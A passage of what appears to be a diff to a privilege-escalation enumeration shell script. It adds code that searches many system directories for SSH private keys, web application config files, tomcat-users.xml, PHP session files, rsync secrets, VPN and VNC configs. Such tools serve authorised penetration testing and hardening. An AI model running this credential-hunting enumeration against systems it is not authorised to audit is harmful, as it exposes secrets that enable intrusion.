2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run/ $FIND_DOCKER_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system/ $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - - #MacOS - FIND_PRIVATE=`eval_bckgrd "find /private/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -O $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /Applications/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter + #GENERATE THE STORAGES OF THE FOUND FILES + PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e 
"$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "sites-enabled$|000-default$" | sort | uniq | head -n 70) + PSTORAGE_PHPCOOKIES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/var|^/mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "wp-config\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/default/settings.php' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "settings\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 'moodle/config.php' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "config\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 
"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70)
+ PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "cesi\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_RSYNC=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70)
+ PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70)
+ PSTORAGE_VNC=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70)
+ PSTORAGE_LDAP=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ldap$" | sort | uniq | head -n 70)
+ PSTORAGE_OPEN_VPN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70)
+ PSTORAGE_SSH_FILES=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70)
